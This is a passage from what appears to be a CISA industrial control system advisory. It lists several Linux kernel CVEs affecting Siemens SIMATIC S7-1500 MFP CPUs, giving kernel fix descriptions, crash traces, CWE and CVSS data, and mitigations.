<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21938</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: fix 'scheduling while atomic' in mptcp_pm_nl_append_new_local_addr If multiple connection requests attempt to create an implicit mptcp endpoint in parallel, more than one caller may end up in mptcp_pm_nl_append_new_local_addr because none found the address in local_addr_list during their call to mptcp_pm_nl_get_local_id. In this case, the concurrent new_local_addr calls may delete the address entry created by the previous caller. These deletes use synchronize_rcu, but this is not permitted in some of the contexts where this function may be called. During packet recv, the caller may be in a rcu read critical section and have preemption disabled. An example stack: BUG: scheduling while atomic: swapper/2/0/0x00000302 Call Trace: dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1)) dump_stack (lib/dump_stack.c:124) __schedule_bug (kernel/sched/core.c:5943) schedule_debug.constprop.0 (arch/x86/include/asm/preempt.h:33 kernel/sched/core.c:5970) __schedule (arch/x86/include/asm/jump_label.h:27 include/linux/jump_label.h:207 kernel/sched/features.h:29 kernel/sched/core.c:6621) schedule (arch/x86/include/asm/preempt.h:84 kernel/sched/core.c:6804 kernel/sched/core.c:6818) schedule_timeout (kernel/time/timer.c:2160) wait_for_completion (kernel/sched/completion.c:96 kernel/sched/completion.c:116 kernel/sched/completion.c:127 kernel/sched/completion.c:148) __wait_rcu_gp (include/linux/rcupdate.h:311 kernel/rcu/update.c:444) synchronize_rcu (kernel/rcu/tree.c:3609) mptcp_pm_nl_append_new_local_addr (net/mptcp/pm_netlink.c:966 net/mptcp/pm_netlink.c:1061) mptcp_pm_nl_get_local_id (net/mptcp/pm_netlink.c:1164) mptcp_pm_get_local_id (net/mptcp/pm.c:420) subflow_check_req (net/mptcp/subflow.c:98 net/mptcp/subflow.c:213) subflow_v4_route_req (net/mptcp/subflow.c:305) tcp_conn_request (net/ipv4/tcp_input.c:7216) subflow_v4_conn_request (net/mptcp/subflow.c:651) tcp_rcv_state_process (net/ipv4/tcp_input.c:6709) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1934) tcp_v4_rcv (net/ipv4/tcp_ipv4.c:2334) ip_protocol_deliver_rcu (net/ipv4/ip_input.c:205 (discriminator 1)) ip_local_deliver_finish (include/linux/rcupdate.h:813 net/ipv4/ip_input.c:234) ip_local_deliver (include/linux/netfilter.h:314 include/linux/netfilter.h:308 net/ipv4/ip_input.c:254) ip_sublist_rcv_finish (include/net/dst.h:461 net/ipv4/ip_input.c:580) ip_sublist_rcv (net/ipv4/ip_input.c:640) ip_list_rcv (net/ipv4/ip_input.c:675) __netif_receive_skb_list_core (net/core/dev.c:5583 net/core/dev.c:5631) netif_receive_skb_list_internal (net/core/dev.c:5685 net/core/dev.c:5774) napi_complete_done (include/linux/list.h:37 include/net/gro.h:449 include/net/gro.h:444 net/core/dev.c:6114) igb_poll (drivers/net/ethernet/intel/igb/igb_main.c:8244) igb __napi_poll (net/core/dev.c:6582) net_rx_action (net/core/dev.c:6653 net/core/dev.c:6787) handle_softirqs (kernel/softirq.c:553) __irq_exit_rcu (kernel/softirq.c:588 kernel/softirq.c:427 kernel/softirq.c:636) irq_exit_rcu (kernel/softirq.c:651) common_interrupt (arch/x86/kernel/irq.c:247 (discriminator 14)) This problem seems particularly prevalent if the user advertises an endpoint that has a different external vs internal address. In the case where the external address is advertised and multiple connections already exist, multiple subflow SYNs arrive in parallel which tends to trigger the race during creation of the first local_addr_list entries which have the internal address instead. Fix by skipping the replacement of an existing implicit local address if called via mptcp_pm_nl_get_local_id.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21938">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/362.html">CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21959</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_conncount: Fully initialize struct nf_conncount_tuple in insert_tree() Since commit b36e4523d4d5 ("netfilter: nf_conncount: fix garbage collection confirm race"), `cpu` and `jiffies32` were introduced to the struct nf_conncount_tuple. The commit made nf_conncount_add() initialize `conn-&gt;cpu` and `conn-&gt;jiffies32` when allocating the struct. In contrast, count_tree() was not changed to initialize them. By commit 34848d5c896e ("netfilter: nf_conncount: Split insert and traversal"), count_tree() was split and the relevant allocation code now resides in insert_tree(). Initialize `conn-&gt;cpu` and `conn-&gt;jiffies32` in insert_tree(). BUG: KMSAN: uninit-value in find_or_evict net/netfilter/nf_conncount.c:117 [inline] BUG: KMSAN: uninit-value in __nf_conncount_add+0xd9c/0x2850 net/netfilter/nf_conncount.c:143 find_or_evict net/netfilter/nf_conncount.c:117 [inline] __nf_conncount_add+0xd9c/0x2850 net/netfilter/nf_conncount.c:143 count_tree net/netfilter/nf_conncount.c:438 [inline] nf_conncount_count+0x82f/0x1e80 net/netfilter/nf_conncount.c:521 connlimit_mt+0x7f6/0xbd0 net/netfilter/xt_connlimit.c:72 __nft_match_eval net/netfilter/nft_compat.c:403 [inline] nft_match_eval+0x1a5/0x300 net/netfilter/nft_compat.c:433 expr_call_ops_eval net/netfilter/nf_tables_core.c:240 [inline] nft_do_chain+0x426/0x2290 net/netfilter/nf_tables_core.c:288 nft_do_chain_ipv4+0x1a5/0x230 net/netfilter/nft_chain_filter.c:23 nf_hook_entry_hookfn include/linux/netfilter.h:154 [inline] nf_hook_slow+0xf4/0x400 net/netfilter/core.c:626 nf_hook_slow_list+0x24d/0x860 net/netfilter/core.c:663 NF_HOOK_LIST include/linux/netfilter.h:350 [inline] ip_sublist_rcv+0x17b7/0x17f0 net/ipv4/ip_input.c:633 ip_list_rcv+0x9ef/0xa40 net/ipv4/ip_input.c:669 __netif_receive_skb_list_ptype net/core/dev.c:5936 [inline] __netif_receive_skb_list_core+0x15c5/0x1670 net/core/dev.c:5983 __netif_receive_skb_list net/core/dev.c:6035 [inline] netif_receive_skb_list_internal+0x1085/0x1700 net/core/dev.c:6126 netif_receive_skb_list+0x5a/0x460 net/core/dev.c:6178 xdp_recv_frames net/bpf/test_run.c:280 [inline] xdp_test_run_batch net/bpf/test_run.c:361 [inline] bpf_test_run_xdp_live+0x2e86/0x3480 net/bpf/test_run.c:390 bpf_prog_test_run_xdp+0xf1d/0x1ae0 net/bpf/test_run.c:1316 bpf_prog_test_run+0x5e5/0xa30 kernel/bpf/syscall.c:4407 __sys_bpf+0x6aa/0xd90 kernel/bpf/syscall.c:5813 __do_sys_bpf kernel/bpf/syscall.c:5902 [inline] __se_sys_bpf kernel/bpf/syscall.c:5900 [inline] __ia32_sys_bpf+0xa0/0xe0 kernel/bpf/syscall.c:5900 ia32_sys_call+0x394d/0x4180 arch/x86/include/generated/asm/syscalls_32.h:358 do_syscall_32_irqs_on arch/x86/entry/common.c:165 [inline] __do_fast_syscall_32+0xb0/0x110 arch/x86/entry/common.c:387 do_fast_syscall_32+0x38/0x80 arch/x86/entry/common.c:412 do_SYSENTER_32+0x1f/0x30 arch/x86/entry/common.c:450 entry_SYSENTER_compat_after_hwframe+0x84/0x8e Uninit was created at: slab_post_alloc_hook mm/slub.c:4121 [inline] slab_alloc_node mm/slub.c:4164 [inline] kmem_cache_alloc_noprof+0x915/0xe10 mm/slub.c:4171 insert_tree net/netfilter/nf_conncount.c:372 [inline] count_tree net/netfilter/nf_conncount.c:450 [inline] nf_conncount_count+0x1415/0x1e80 net/netfilter/nf_conncount.c:521 connlimit_mt+0x7f6/0xbd0 net/netfilter/xt_connlimit.c:72 __nft_match_eval net/netfilter/nft_compat.c:403 [inline] nft_match_eval+0x1a5/0x300 net/netfilter/nft_compat.c:433 expr_call_ops_eval net/netfilter/nf_tables_core.c:240 [inline] nft_do_chain+0x426/0x2290 net/netfilter/nf_tables_core.c:288 nft_do_chain_ipv4+0x1a5/0x230 net/netfilter/nft_chain_filter.c:23 nf_hook_entry_hookfn include/linux/netfilter.h:154 [inline] nf_hook_slow+0xf4/0x400 net/netfilter/core.c:626 nf_hook_slow_list+0x24d/0x860 net/netfilter/core.c:663 NF_HOOK_LIST include/linux/netfilter.h:350 [inline] ip_sublist_rcv+0x17b7/0x17f0 net/ipv4/ip_input.c:633 ip_list_rcv+0x9ef/0xa40 net/ip ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21959">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/908.html">CWE-908 Use of Uninitialized Resource</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21999</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: proc: fix UAF in proc_get_inode() Fix race between rmmod and /proc/XXX's inode instantiation. The bug is that pde-&gt;proc_ops don't belong to /proc, it belongs to a module, therefore dereferencing it after /proc entry has been registered is a bug unless use_pde/unuse_pde() pair has been used. use_pde/unuse_pde can be avoided (2 atomic ops!) because pde-&gt;proc_ops never changes so information necessary for inode instantiation can be saved _before_ proc_register() in PDE itself and used later, avoiding pde-&gt;proc_ops-&gt;... dereference. rmmod lookup sys_delete_module proc_lookup_de pde_get(de); proc_get_inode(dir-&gt;i_sb, de); mod-&gt;exit() proc_remove remove_proc_subtree proc_entry_rundown(de); free_module(mod); if (S_ISREG(inode-&gt;i_mode)) if (de-&gt;proc_ops-&gt;proc_read_iter) --&gt; As module is already freed, will trigger UAF BUG: unable to handle page fault for address: fffffbfff80a702b PGD 817fc4067 P4D 817fc4067 PUD 817fc0067 PMD 102ef4067 PTE 0 Oops: Oops: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 26 UID: 0 PID: 2667 Comm: ls Tainted: G Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) RIP: 0010:proc_get_inode+0x302/0x6e0 RSP: 0018:ffff88811c837998 EFLAGS: 00010a06 RAX: dffffc0000000000 RBX: ffffffffc0538140 RCX: 0000000000000007 RDX: 1ffffffff80a702b RSI: 0000000000000001 RDI: ffffffffc0538158 RBP: ffff8881299a6000 R08: 0000000067bbe1e5 R09: 1ffff11023906f20 R10: ffffffffb560ca07 R11: ffffffffb2b43a58 R12: ffff888105bb78f0 R13: ffff888100518048 R14: ffff8881299a6004 R15: 0000000000000001 FS: 00007f95b9686840(0000) GS:ffff8883af100000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: fffffbfff80a702b CR3: 0000000117dd2000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: proc_lookup_de+0x11f/0x2e0 __lookup_slow+0x188/0x350 walk_component+0x2ab/0x4f0 path_lookupat+0x120/0x660 filename_lookup+0x1ce/0x560 vfs_statx+0xac/0x150 __do_sys_newstat+0x96/0x110 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e [adobriyan@gmail.com: don't do 2 atomic ops on the common path]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21999">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22005</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix memleak of nhc_pcpu_rth_output in fib_check_nh_v6_gw(). fib_check_nh_v6_gw() expects that fib6_nh_init() cleans up everything when it fails. Commit 7dd73168e273 ("ipv6: Always allocate pcpu memory in a fib6_nh") moved fib_nh_common_init() before alloc_percpu_gfp() within fib6_nh_init() but forgot to add cleanup for fib6_nh-&gt;nh_common.nhc_pcpu_rth_output in case it fails to allocate fib6_nh-&gt;rt6i_pcpu, resulting in memleak. Let's call fib_nh_common_release() and clear nhc_pcpu_rth_output in the error path. Note that we can remove the fib6_nh_release() call in nh_create_ipv6() later in net-next.git.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22005">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/401.html">CWE-401 Missing Release of Memory after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22015</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mm/migrate: fix shmem xarray update during migration A shmem folio can be either in page cache or in swap cache, but not at the same time. Namely, once it is in swap cache, folio-&gt;mapping should be NULL, and the folio is no longer in a shmem mapping. In __folio_migrate_mapping(), to determine the number of xarray entries to update, folio_test_swapbacked() is used, but that conflates shmem in page cache case and shmem in swap cache case. It leads to xarray multi-index entry corruption, since it turns a sibling entry to a normal entry during xas_store() (see [1] for a userspace reproduction). Fix it by only using folio_test_swapcache() to determine whether xarray is storing swap cache entries or not to choose the right number of xarray entries to update. [1] https://lore.kernel.org/linux-mm/Z8idPCkaJW1IChjT@casper.infradead.org/ Note: In __split_huge_page(), folio_test_anon() &amp;&amp; folio_test_swapcache() is used to get swap_cache address space, but that ignores the shmem folio in swap cache case. It could lead to NULL pointer dereferencing when a in-swap-cache shmem folio is split at __xa_store(), since !folio_test_anon() is true and folio-&gt;mapping is NULL. But fortunately, its caller split_huge_page_to_list_to_order() bails out early with EBUSY when folio-&gt;mapping is NULL. So no need to take care of it here.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22015">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-22055</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fix geneve_opt length integer overflow struct geneve_opt uses 5 bit length for each single option, which means every vary size option should be smaller than 128 bytes. However, all current related Netlink policies cannot promise this length condition and the attacker can exploit a exact 128-byte size option to *fake* a zero length option and confuse the parsing logic, further achieve heap out-of-bounds read. One example crash log is like below: [ 3.905425] ================================================================== [ 3.905925] BUG: KASAN: slab-out-of-bounds in nla_put+0xa9/0xe0 [ 3.906255] Read of size 124 at addr ffff888005f291cc by task poc/177 [ 3.906646] [ 3.906775] CPU: 0 PID: 177 Comm: poc-oob-read Not tainted 6.1.132 #1 [ 3.907131] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014 [ 3.907784] Call Trace: [ 3.907925] [ 3.908048] dump_stack_lvl+0x44/0x5c [ 3.908258] print_report+0x184/0x4be [ 3.909151] kasan_report+0xc5/0x100 [ 3.909539] kasan_check_range+0xf3/0x1a0 [ 3.909794] memcpy+0x1f/0x60 [ 3.909968] nla_put+0xa9/0xe0 [ 3.910147] tunnel_key_dump+0x945/0xba0 [ 3.911536] tcf_action_dump_1+0x1c1/0x340 [ 3.912436] tcf_action_dump+0x101/0x180 [ 3.912689] tcf_exts_dump+0x164/0x1e0 [ 3.912905] fw_dump+0x18b/0x2d0 [ 3.913483] tcf_fill_node+0x2ee/0x460 [ 3.914778] tfilter_notify+0xf4/0x180 [ 3.915208] tc_new_tfilter+0xd51/0x10d0 [ 3.918615] rtnetlink_rcv_msg+0x4a2/0x560 [ 3.919118] netlink_rcv_skb+0xcd/0x200 [ 3.919787] netlink_unicast+0x395/0x530 [ 3.921032] netlink_sendmsg+0x3d0/0x6d0 [ 3.921987] __sock_sendmsg+0x99/0xa0 [ 3.922220] __sys_sendto+0x1b7/0x240 [ 3.922682] __x64_sys_sendto+0x72/0x90 [ 3.922906] do_syscall_64+0x5e/0x90 [ 3.923814] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 [ 3.924122] RIP: 0033:0x7e83eab84407 [ 3.924331] Code: 48 89 fa 4c 89 df e8 38 aa 00 00 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 1a 5b c3 0f 1f 84 00 00 00 00 00 48 8b 44 24 10 0f 05 &lt;5b&gt; c3 0f 1f 80 00 00 00 00 83 e2 39 83 faf [ 3.925330] RSP: 002b:00007ffff505e370 EFLAGS: 00000202 ORIG_RAX: 000000000000002c [ 3.925752] RAX: ffffffffffffffda RBX: 00007e83eaafa740 RCX: 00007e83eab84407 [ 3.926173] RDX: 00000000000001a8 RSI: 00007ffff505e3c0 RDI: 0000000000000003 [ 3.926587] RBP: 00007ffff505f460 R08: 00007e83eace1000 R09: 000000000000000c [ 3.926977] R10: 0000000000000000 R11: 0000000000000202 R12: 00007ffff505f3c0 [ 3.927367] R13: 00007ffff505f5c8 R14: 00007e83ead1b000 R15: 00005d4fbbe6dcb8 Fix these issues by enforing correct length condition in related policies.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-22055">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
